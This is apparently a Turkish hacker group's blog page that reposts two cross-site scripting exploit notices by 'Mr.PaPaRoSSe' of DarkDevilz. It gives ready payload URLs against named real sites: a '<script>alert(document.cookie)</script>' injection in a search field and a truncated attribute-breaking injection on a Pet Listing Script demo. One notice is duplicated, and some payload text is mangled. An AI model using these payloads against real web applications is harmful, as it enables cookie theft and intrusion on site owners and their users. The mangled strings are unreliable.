# Exploit Title: GraphicClone XSS
# Date: 24.12.2011 - 13.18
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php
-------------------------------------------------------------
SearchBOX
graphics.cloneforest.com/search/
<script>ale rt(document.cookie)</script>
http://graphics.cloneforest.com/search/?term=<script>alert( document.cookie)</script>
XSS
-------------------------------------------------------------
Mr.PaPaRoSSe / 3spi0n
paparosse.blogspot.com
GrayHatz.co
25 Aralık 2011 Pazar
GraphicClone Cross Site Scripting
9 Aralık 2011 Cuma
Pet Listing Cross Site Scripting
Aktiflik sıkıntısını yaşıyorum.Kendi ismim ile bazı işlere imza attım.Ondan dolayı pek boş zamanım olmuyor.Olduğu zamanda şekil a görüntü b böyle araştırıyoruz ^^
# Exploit Title: Pet Listing Script XSS
# Date: 09.12.2011 - 17.00
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php
-------------------------------------------------------------
preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">
DEMO
http://www.classifiedsgeek.com/pet-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">
-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
- Mr.PaPaRoSSe / 3spi0n -
~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#
# Exploit Title: Pet Listing Script XSS
# Date: 09.12.2011 - 17.00
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php
-------------------------------------------------------------
preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">
DEMO
http://www.classifiedsgeek.com/pet-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">
-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
- Mr.PaPaRoSSe / 3spi0n -
~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#
Etiketler:
bug,
Cross,
darkdevilz,
Listing,
mr.paparosse,
Pet,
Scripting,
Site,
ulen,
xss
Kaydol:
Kayıtlar (Atom)